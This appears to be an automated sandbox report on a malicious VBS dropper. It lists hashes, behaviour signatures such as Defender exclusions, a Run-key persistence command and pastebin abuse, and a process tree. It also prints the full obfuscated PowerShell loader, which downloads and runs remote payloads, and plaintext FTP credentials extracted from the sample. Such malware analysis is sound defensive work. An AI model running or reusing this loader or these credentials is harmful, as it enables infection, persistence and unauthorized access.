1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726

Analysis

max time kernel
145s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs
Size

681KB
MD5

1794218436b165f2161c183c0af24a53
SHA1

53d26bff0dac5b9424d6e21ab7aa80c5b20753cc
SHA256

1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726
SHA512

059e2d5fecd7bf2cfdef7d47c4bfb424344cd28d282e1f979f2b2e0d3afa7dda98f0c441fe93a8be93de0a4ae70d28aedeeae51012b21532b11cbe45cfcbf143
SSDEEP

1536:4vvvvvvvvvvvvvvvvvvvvvvvL88888888888888888888888888888888888888F:4MZe1

Score

10^/10

defense_evasion execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Signatures

Blocklisted process makes network request 29 IoCs

flow	pid	Process
8	2552	powershell.exe
19	2552	powershell.exe
21	2552	powershell.exe
24	2552	powershell.exe
26	2552	powershell.exe
28	2552	powershell.exe
36	2552	powershell.exe
39	2552	powershell.exe
40	2552	powershell.exe
46	2552	powershell.exe
55	2552	powershell.exe
56	2552	powershell.exe
57	2552	powershell.exe
58	2552	powershell.exe
59	2552	powershell.exe
62	2552	powershell.exe
63	2552	powershell.exe
64	2552	powershell.exe
65	2552	powershell.exe
67	2552	powershell.exe
71	2552	powershell.exe
72	2552	powershell.exe
73	2552	powershell.exe
74	2552	powershell.exe
75	2552	powershell.exe
76	2552	powershell.exe
77	2552	powershell.exe
78	2552	powershell.exe
79	2552	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4348	powershell.exe
5020	powershell.exe
4392	powershell.exe
3388	powershell.exe
2552	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_enc = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\owimt.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	pastebin.com
26	pastebin.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
3388	powershell.exe
3388	powershell.exe
2552	powershell.exe
2552	powershell.exe
2552	powershell.exe
4348	powershell.exe
5020	powershell.exe
4348	powershell.exe
5020	powershell.exe
4392	powershell.exe
4392	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	4392	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2988 wrote to memory of 3388	2988	WScript.exe	82
PID 2988 wrote to memory of 3388	2988	WScript.exe	82
PID 3388 wrote to memory of 2552	3388	powershell.exe	84
PID 3388 wrote to memory of 2552	3388	powershell.exe	84
PID 2552 wrote to memory of 4348	2552	powershell.exe	89
PID 2552 wrote to memory of 4348	2552	powershell.exe	89
PID 2552 wrote to memory of 5020	2552	powershell.exe	90
PID 2552 wrote to memory of 5020	2552	powershell.exe	90
PID 2552 wrote to memory of 1136	2552	powershell.exe	91
PID 2552 wrote to memory of 1136	2552	powershell.exe	91
PID 2552 wrote to memory of 4392	2552	powershell.exe	92
PID 2552 wrote to memory of 4392	2552	powershell.exe	92
PID 2552 wrote to memory of 628	2552	powershell.exe	94
PID 2552 wrote to memory of 628	2552	powershell.exe	94
PID 2552 wrote to memory of 3684	2552	powershell.exe	95
PID 2552 wrote to memory of 3684	2552	powershell.exe	95
PID 2552 wrote to memory of 1164	2552	powershell.exe	98
PID 2552 wrote to memory of 1164	2552	powershell.exe	98
PID 2552 wrote to memory of 4592	2552	powershell.exe	99
PID 2552 wrote to memory of 4592	2552	powershell.exe	99
PID 2552 wrote to memory of 3852	2552	powershell.exe	100
PID 2552 wrote to memory of 3852	2552	powershell.exe	100
PID 2552 wrote to memory of 4736	2552	powershell.exe	101
PID 2552 wrote to memory of 4736	2552	powershell.exe	101
PID 2552 wrote to memory of 2248	2552	powershell.exe	102
PID 2552 wrote to memory of 2248	2552	powershell.exe	102
PID 2552 wrote to memory of 620	2552	powershell.exe	103
PID 2552 wrote to memory of 620	2552	powershell.exe	103
PID 2552 wrote to memory of 3004	2552	powershell.exe	105
PID 2552 wrote to memory of 3004	2552	powershell.exe	105
PID 2552 wrote to memory of 224	2552	powershell.exe	106
PID 2552 wrote to memory of 224	2552	powershell.exe	106
PID 2552 wrote to memory of 4564	2552	powershell.exe	108
PID 2552 wrote to memory of 4564	2552	powershell.exe	108
PID 2552 wrote to memory of 868	2552	powershell.exe	109
PID 2552 wrote to memory of 868	2552	powershell.exe	109
PID 2552 wrote to memory of 4432	2552	powershell.exe	110
PID 2552 wrote to memory of 4432	2552	powershell.exe	110
PID 2552 wrote to memory of 3884	2552	powershell.exe	111
PID 2552 wrote to memory of 3884	2552	powershell.exe	111
PID 2552 wrote to memory of 4332	2552	powershell.exe	112
PID 2552 wrote to memory of 4332	2552	powershell.exe	112
PID 2552 wrote to memory of 4744	2552	powershell.exe	113
PID 2552 wrote to memory of 4744	2552	powershell.exe	113
PID 2552 wrote to memory of 4444	2552	powershell.exe	114
PID 2552 wrote to memory of 4444	2552	powershell.exe	114
PID 2552 wrote to memory of 4700	2552	powershell.exe	115
PID 2552 wrote to memory of 4700	2552	powershell.exe	115
PID 2552 wrote to memory of 3556	2552	powershell.exe	116
PID 2552 wrote to memory of 3556	2552	powershell.exe	116
PID 2552 wrote to memory of 2888	2552	powershell.exe	117
PID 2552 wrote to memory of 2888	2552	powershell.exe	117
PID 2552 wrote to memory of 5052	2552	powershell.exe	118
PID 2552 wrote to memory of 5052	2552	powershell.exe	118
PID 2552 wrote to memory of 4944	2552	powershell.exe	119
PID 2552 wrote to memory of 4944	2552	powershell.exe	119
PID 2552 wrote to memory of 3056	2552	powershell.exe	120
PID 2552 wrote to memory of 3056	2552	powershell.exe	120
PID 2552 wrote to memory of 2208	2552	powershell.exe	121
PID 2552 wrote to memory of 2208	2552	powershell.exe	121
PID 2552 wrote to memory of 2392	2552	powershell.exe	122
PID 2552 wrote to memory of 2392	2552	powershell.exe	122
PID 2552 wrote to memory of 3708	2552	powershell.exe	123
PID 2552 wrote to memory of 3708	2552	powershell.exe	123

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2988
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$mpAQs = 'OwB9ШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉGUШḆЉdQByШḆЉHQШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉBlШḆЉGoШḆЉdwB6ШḆЉGgШḆЉJШḆЉШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉGgШḆЉdШḆЉB0ШḆЉHШḆЉШḆЉcwШḆЉ6ШḆЉC8ШḆЉLwBwШḆЉGEШḆЉcwB0ШḆЉGUШḆЉYgBpШḆЉG4ШḆЉLgBjШḆЉG8ШḆЉbQШḆЉvШḆЉHIШḆЉYQB3ШḆЉC8ШḆЉZQBUШḆЉHMШḆЉMwBUШḆЉDkШḆЉWШḆЉBmШḆЉCcШḆЉIШḆЉШḆЉoШḆЉCШḆЉШḆЉXQBdШḆЉFsШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉG8ШḆЉWwШḆЉgШḆЉCwШḆЉIШḆЉBsШḆЉGwШḆЉdQBuШḆЉCQШḆЉIШḆЉШḆЉoШḆЉGUШḆЉawBvШḆЉHYШḆЉbgBJШḆЉC4ШḆЉKQШḆЉgШḆЉCcШḆЉSQBWШḆЉEYШḆЉcgBwШḆЉCcШḆЉIШḆЉШḆЉoШḆЉGQШḆЉbwBoШḆЉHQШḆЉZQBNШḆЉHQШḆЉZQBHШḆЉC4ШḆЉKQШḆЉnШḆЉDEШḆЉcwBzШḆЉGEШḆЉbШḆЉBDШḆЉC4ШḆЉMwB5ШḆЉHIШḆЉYQByШḆЉGIШḆЉaQBMШḆЉHMШḆЉcwBhШḆЉGwШḆЉQwШḆЉnШḆЉCgШḆЉZQBwШḆЉHkШḆЉVШḆЉB0ШḆЉGUШḆЉRwШḆЉuШḆЉCkШḆЉIШḆЉB4ШḆЉG0ШḆЉegBYШḆЉHgШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZШḆЉBhШḆЉG8ШḆЉTШḆЉШḆЉuШḆЉG4ШḆЉaQBhШḆЉG0ШḆЉbwBEШḆЉHQШḆЉbgBlШḆЉHIШḆЉcgB1ШḆЉEMШḆЉOgШḆЉ6ШḆЉF0ШḆЉbgBpШḆЉGEШḆЉbQBvШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉDsШḆЉKQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉEEШḆЉJwШḆЉgШḆЉCwШḆЉIШḆЉШḆЉnШḆЉJMhOgCTIScШḆЉIШḆЉШḆЉoШḆЉGUШḆЉYwBhШḆЉGwШḆЉcШḆЉBlШḆЉFIШḆЉLgBRШḆЉGoШḆЉbgB3ШḆЉGwШḆЉJШḆЉШḆЉgШḆЉCgШḆЉZwBuШḆЉGkШḆЉcgB0ШḆЉFMШḆЉNШḆЉШḆЉ2ШḆЉGUШḆЉcwBhШḆЉEIШḆЉbQBvШḆЉHIШḆЉRgШḆЉ6ШḆЉDoШḆЉXQB0ШḆЉHIШḆЉZQB2ШḆЉG4ШḆЉbwBDШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉB4ШḆЉG0ШḆЉegBYШḆЉHgШḆЉJШḆЉШḆЉgШḆЉF0ШḆЉXQBbШḆЉGUШḆЉdШḆЉB5ШḆЉEIШḆЉWwШḆЉ7ШḆЉCcШḆЉJQBJШḆЉGgШḆЉcQBSШḆЉFgШḆЉJQШḆЉnШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGUШḆЉagB3ШḆЉHoШḆЉaШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉFEШḆЉagBuШḆЉHcШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉKШḆЉBnШḆЉG4ШḆЉaQByШḆЉHQШḆЉUwBkШḆЉGEШḆЉbwBsШḆЉG4ШḆЉdwBvШḆЉEQШḆЉLgBDШḆЉG0ШḆЉVgBxШḆЉGwШḆЉJШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉGoШḆЉbgB3ШḆЉGwШḆЉJШḆЉШḆЉ7ШḆЉDgШḆЉRgBUШḆЉFUШḆЉOgШḆЉ6ШḆЉF0ШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉdШḆЉB4ШḆЉGUШḆЉVШḆЉШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉZwBuШḆЉGkШḆЉZШḆЉBvШḆЉGMШḆЉbgBFШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉpШḆЉHQШḆЉbgBlШḆЉGkШḆЉbШḆЉBDШḆЉGIШḆЉZQBXШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉIШḆЉB0ШḆЉGMШḆЉZQBqШḆЉGIШḆЉTwШḆЉtШḆЉHcШḆЉZQBOШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉpШḆЉCgШḆЉZQBzШḆЉG8ШḆЉcШḆЉBzШḆЉGkШḆЉZШḆЉШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉgШḆЉCcШḆЉdШḆЉB4ШḆЉHQШḆЉLgШḆЉxШḆЉDШḆЉШḆЉTШḆЉBMШḆЉEQШḆЉLwШḆЉxШḆЉDШḆЉШḆЉLwByШḆЉGUШḆЉdШḆЉBwШḆЉHkШḆЉcgBjШḆЉHШḆЉШḆЉVQШḆЉvШḆЉHIШḆЉYgШḆЉuШḆЉG0ШḆЉbwBjШḆЉC4ШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉuШḆЉHШḆЉШḆЉdШḆЉBmШḆЉEШḆЉШḆЉMQB0ШḆЉGEШḆЉcgBiШḆЉHYШḆЉawBjШḆЉHMШḆЉZQBkШḆЉC8ШḆЉLwШḆЉ6ШḆЉHШḆЉШḆЉdШḆЉBmШḆЉCcШḆЉIШḆЉШḆЉoШḆЉGcШḆЉbgBpШḆЉHIШḆЉdШḆЉBTШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉCШḆЉШḆЉPQШḆЉgШḆЉFEШḆЉagBuШḆЉHcШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉEШḆЉШḆЉQШḆЉBwШḆЉEoШḆЉOШḆЉШḆЉ3ШḆЉDUШḆЉMQШḆЉyШḆЉG8ШḆЉcgBwШḆЉHIШḆЉZQBwШḆЉG8ШḆЉbШḆЉBlШḆЉHYШḆЉZQBkШḆЉCcШḆЉLШḆЉШḆЉnШḆЉDEШḆЉdШḆЉBhШḆЉHIШḆЉYgB2ШḆЉGsШḆЉYwBzШḆЉGUШḆЉZШḆЉШḆЉnШḆЉCgШḆЉbШḆЉBhШḆЉGkШḆЉdШḆЉBuШḆЉGUШḆЉZШḆЉBlШḆЉHIШḆЉQwBrШḆЉHIШḆЉbwB3ШḆЉHQШḆЉZQBOШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBvШḆЉC0ШḆЉdwBlШḆЉG4ШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉcwBsШḆЉGEШḆЉaQB0ШḆЉG4ШḆЉZQBkШḆЉGUШḆЉcgBDШḆЉC4ШḆЉQwBtШḆЉFYШḆЉcQBsШḆЉCQШḆЉOwШḆЉ4ШḆЉEYШḆЉVШḆЉBVШḆЉDoШḆЉOgBdШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉHQШḆЉeШḆЉBlШḆЉFQШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGcШḆЉbgBpШḆЉGQШḆЉbwBjШḆЉG4ШḆЉRQШḆЉuШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉKQB0ШḆЉG4ШḆЉZQBpШḆЉGwШḆЉQwBiШḆЉGUШḆЉVwШḆЉuШḆЉHQШḆЉZQBOШḆЉCШḆЉШḆЉdШḆЉBjШḆЉGUШḆЉagBiШḆЉE8ШḆЉLQB3ШḆЉGUШḆЉTgШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEMШḆЉbQBWШḆЉHEШḆЉbШḆЉШḆЉkШḆЉDsШḆЉUQBqШḆЉG4ШḆЉdwBsШḆЉCQШḆЉOwШḆЉyШḆЉDEШḆЉcwBsШḆЉFQШḆЉOgШḆЉ6ШḆЉF0ШḆЉZQBwШḆЉHkШḆЉVШḆЉBsШḆЉG8ШḆЉYwBvШḆЉHQШḆЉbwByШḆЉFШḆЉШḆЉeQB0ШḆЉGkШḆЉcgB1ШḆЉGMШḆЉZQBTШḆЉC4ШḆЉdШḆЉBlШḆЉE4ШḆЉLgBtШḆЉGUШḆЉdШḆЉBzШḆЉHkШḆЉUwBbШḆЉCШḆЉШḆЉPQШḆЉgШḆЉGwШḆЉbwBjШḆЉG8ШḆЉdШḆЉBvШḆЉHIШḆЉUШḆЉB5ШḆЉHQШḆЉaQByШḆЉHUШḆЉYwBlШḆЉFMШḆЉOgШḆЉ6ШḆЉF0ШḆЉcgBlШḆЉGcШḆЉYQBuШḆЉGEШḆЉTQB0ШḆЉG4ШḆЉaQBvШḆЉFШḆЉШḆЉZQBjШḆЉGkШḆЉdgByШḆЉGUШḆЉUwШḆЉuШḆЉHQШḆЉZQBOШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉ7ШḆЉH0ШḆЉZQB1ШḆЉHIШḆЉdШḆЉШḆЉkШḆЉHsШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉawBjШḆЉGEШḆЉYgBsШḆЉGwШḆЉYQBDШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBkШḆЉGkШḆЉbШḆЉBhШḆЉFYШḆЉZQB0ШḆЉGEШḆЉYwBpШḆЉGYШḆЉaQB0ШḆЉHIШḆЉZQBDШḆЉHIШḆЉZQB2ШḆЉHIШḆЉZQBTШḆЉDoШḆЉOgBdШḆЉHIШḆЉZQBnШḆЉGEШḆЉbgBhШḆЉE0ШḆЉdШḆЉBuШḆЉGkШḆЉbwBQШḆЉGUШḆЉYwBpШḆЉHYШḆЉcgBlШḆЉFMШḆЉLgB0ШḆЉGUШḆЉTgШḆЉuШḆЉG0ШḆЉZQB0ШḆЉHMШḆЉeQBTШḆЉFsШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉgШḆЉGYШḆЉLwШḆЉgШḆЉDШḆЉШḆЉIШḆЉB0ШḆЉC8ШḆЉIШḆЉByШḆЉC8ШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉG4ШḆЉdwBvШḆЉGQШḆЉdШḆЉB1ШḆЉGgШḆЉcwШḆЉgШḆЉDsШḆЉJwШḆЉwШḆЉDgШḆЉMQШḆЉgШḆЉHШḆЉШḆЉZQBlШḆЉGwШḆЉcwШḆЉnШḆЉCШḆЉШḆЉZШḆЉBuШḆЉGEШḆЉbQBtШḆЉG8ШḆЉYwШḆЉtШḆЉCШḆЉШḆЉZQB4ШḆЉGUШḆЉLgBsШḆЉGwШḆЉZQBoШḆЉHMШḆЉcgBlШḆЉHcШḆЉbwBwШḆЉDsШḆЉIШḆЉBlШḆЉGMШḆЉcgBvШḆЉGYШḆЉLQШḆЉgШḆЉCkШḆЉIШḆЉШḆЉnШḆЉHШḆЉШḆЉdQB0ШḆЉHIШḆЉYQB0ШḆЉFMШḆЉXШḆЉBzШḆЉG0ШḆЉYQByШḆЉGcШḆЉbwByШḆЉFШḆЉШḆЉXШḆЉB1ШḆЉG4ШḆЉZQBNШḆЉCШḆЉШḆЉdШḆЉByШḆЉGEШḆЉdШḆЉBTШḆЉFwШḆЉcwB3ШḆЉG8ШḆЉZШḆЉBuШḆЉGkШḆЉVwBcШḆЉHQШḆЉZgBvШḆЉHMШḆЉbwByШḆЉGMШḆЉaQBNШḆЉFwШḆЉZwBuШḆЉGkШḆЉbQBhШḆЉG8ШḆЉUgBcШḆЉGEШḆЉdШḆЉBhШḆЉEQШḆЉcШḆЉBwШḆЉEEШḆЉXШḆЉШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉCШḆЉШḆЉKШḆЉШḆЉgШḆЉG4ШḆЉbwBpШḆЉHQШḆЉYQBuШḆЉGkШḆЉdШḆЉBzШḆЉGUШḆЉRШḆЉШḆЉtШḆЉCШḆЉШḆЉJwШḆЉlШḆЉEkШḆЉaШḆЉBxШḆЉFIШḆЉWШḆЉШḆЉlШḆЉCcШḆЉIШḆЉBtШḆЉGUШḆЉdШḆЉBJШḆЉC0ШḆЉeQBwШḆЉG8ШḆЉQwШḆЉgШḆЉDsШḆЉIШḆЉB0ШḆЉHIШḆЉYQB0ШḆЉHMШḆЉZQByШḆЉG8ШḆЉbgШḆЉvШḆЉCШḆЉШḆЉdШḆЉBlШḆЉGkШḆЉdQBxШḆЉC8ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGEШḆЉcwB1ШḆЉHcШḆЉIШḆЉBlШḆЉHgШḆЉZQШḆЉuШḆЉGwШḆЉbШḆЉBlШḆЉGgШḆЉcwByШḆЉGUШḆЉdwBvШḆЉHШḆЉШḆЉIШḆЉШḆЉ7ШḆЉCkШḆЉJwB1ШḆЉHMШḆЉbQШḆЉuШḆЉG4ШḆЉaQB3ШḆЉHШḆЉШḆЉVQBcШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCШḆЉШḆЉcШḆЉBqШḆЉEwШḆЉagBNШḆЉCQШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBRШḆЉEEШḆЉagB6ШḆЉEkШḆЉOwШḆЉpШḆЉCШḆЉШḆЉZQBtШḆЉGEШḆЉTgByШḆЉGUШḆЉcwBVШḆЉDoШḆЉOgBdШḆЉHQШḆЉbgBlШḆЉG0ШḆЉbgBvШḆЉHIШḆЉaQB2ШḆЉG4ШḆЉRQBbШḆЉCШḆЉШḆЉKwШḆЉgШḆЉCcШḆЉXШḆЉBzШḆЉHIШḆЉZQBzШḆЉFUШḆЉXШḆЉШḆЉ6ШḆЉEMШḆЉJwШḆЉoШḆЉCШḆЉШḆЉPQШḆЉgШḆЉEYШḆЉRwByШḆЉFUШḆЉQQШḆЉkШḆЉDsШḆЉKQШḆЉnШḆЉHUШḆЉcwBtШḆЉC4ШḆЉbgBpШḆЉHcШḆЉcШḆЉBVШḆЉFwШḆЉJwШḆЉgШḆЉCsШḆЉIШḆЉBwШḆЉGoШḆЉTШḆЉBqШḆЉE0ШḆЉJШḆЉШḆЉgШḆЉCwШḆЉQgBLШḆЉEwШḆЉUgBVШḆЉCQШḆЉKШḆЉBlШḆЉGwШḆЉaQBGШḆЉGQШḆЉYQBvШḆЉGwШḆЉbgB3ШḆЉG8ШḆЉRШḆЉШḆЉuШḆЉGMШḆЉWQBCШḆЉHkШḆЉTgШḆЉkШḆЉDsШḆЉOШḆЉBGШḆЉFQШḆЉVQШḆЉ6ШḆЉDoШḆЉXQBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgB0ШḆЉHgШḆЉZQBUШḆЉC4ШḆЉbQBlШḆЉHQШḆЉcwB5ШḆЉFMШḆЉWwШḆЉgШḆЉD0ШḆЉIШḆЉBnШḆЉG4ШḆЉaQBkШḆЉG8ШḆЉYwBuШḆЉEUШḆЉLgBjШḆЉFkШḆЉQgB5ШḆЉE4ШḆЉJШḆЉШḆЉ7ШḆЉCkШḆЉdШḆЉBuШḆЉGUШḆЉaQBsШḆЉEMШḆЉYgBlШḆЉFcШḆЉLgB0ШḆЉGUШḆЉTgШḆЉgШḆЉHQШḆЉYwBlШḆЉGoШḆЉYgBPШḆЉC0ШḆЉdwBlШḆЉE4ШḆЉKШḆЉШḆЉgШḆЉD0ШḆЉIШḆЉBjШḆЉFkШḆЉQgB5ШḆЉE4ШḆЉJШḆЉШḆЉ7ШḆЉH0ШḆЉOwШḆЉgШḆЉCkШḆЉJwByШḆЉGcШḆЉOШḆЉBEШḆЉDcШḆЉbwBSШḆЉHMШḆЉZgBWШḆЉGMШḆЉcgШḆЉyШḆЉG4ШḆЉQQBoШḆЉGYШḆЉaШḆЉBWШḆЉDYШḆЉRШḆЉBDШḆЉHgШḆЉUgBxШḆЉG4ШḆЉcQBqШḆЉDUШḆЉagByШḆЉGIШḆЉMQШḆЉnШḆЉCШḆЉШḆЉKwШḆЉgШḆЉFШḆЉШḆЉcШḆЉBWШḆЉGkШḆЉcwШḆЉkШḆЉCgШḆЉIШḆЉШḆЉ9ШḆЉCШḆЉШḆЉUШḆЉBwШḆЉFYШḆЉaQBzШḆЉCQШḆЉewШḆЉgШḆЉGUШḆЉcwBsШḆЉGUШḆЉfQШḆЉ7ШḆЉCШḆЉШḆЉKQШḆЉnШḆЉHgШḆЉNШḆЉBmШḆЉGgШḆЉWgBNШḆЉHcШḆЉTgШḆЉ3ШḆЉFUШḆЉZQBfШḆЉDШḆЉШḆЉXwШḆЉ1ШḆЉF8ШḆЉaQBjШḆЉHMШḆЉYgBoШḆЉDcШḆЉQwBQШḆЉDШḆЉШḆЉSQBmШḆЉFШḆЉШḆЉZШḆЉBBШḆЉDIШḆЉMQШḆЉxШḆЉCcШḆЉIШḆЉШḆЉrШḆЉCAAUABwAFYAaQBzACQAKAAgAD0AIABQAHAAVgBpAHMAJAB7ACAAKQBvAEcAZgBEAFEAJAAoACAAZgBpADsAIAApACcANAA2ACcAKABzAG4AaQBhAHQAbgBvAEMALgBFAFIAVQBUAEMARQBUAEkASABDAFIAQQBfAFIATwBTAFMARQBDAE8AUgBQADoAdgBuAGUAJAAgAD0AIABvAEcAZgBEAFEAJAA7ACcAPQBkAGkAJgBkAGEAbwBsAG4AdwBvAGQAPQB0AHIAbwBwAHgAZQA/AGMAdQAvAG0AbwBjAC4AZQBsAGcAbwBvAGcALgBlAHYAaQByAGQALwAvADoAcwBwAHQAdABoACcAIAA9ACШḆЉAUABwAFYAaQBzACQAOwApACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAHAAagBMAGoATQAkACgAIABsAGUAZAA7ACkAKABoAHQAYQBQAHAAbQBlAFQAdABlAEcAOgA6AF0AaAB0AGEAUAAuAE8ASQAuAG0AZQB0AHMAeQBTAFsAIAA9ACAAcABqAEwAagBNACQAewAgACkAawBjAEoASABlACQAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAGsAYwBKAEgAZQAkACAAOwA=';$tYYYr = $mpAQs.replace('ШḆЉ' , 'A') ;$bZIaf = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $tYYYr ) ); $bZIaf = $bZIaf[-1..-$bZIaf.Length] -join '';$bZIaf = $bZIaf.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\1950e399f332130f25fe5f2ba9c858b7987bfb973ff84cb5e1679fd3105c5726.vbs');powershell $bZIaf
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
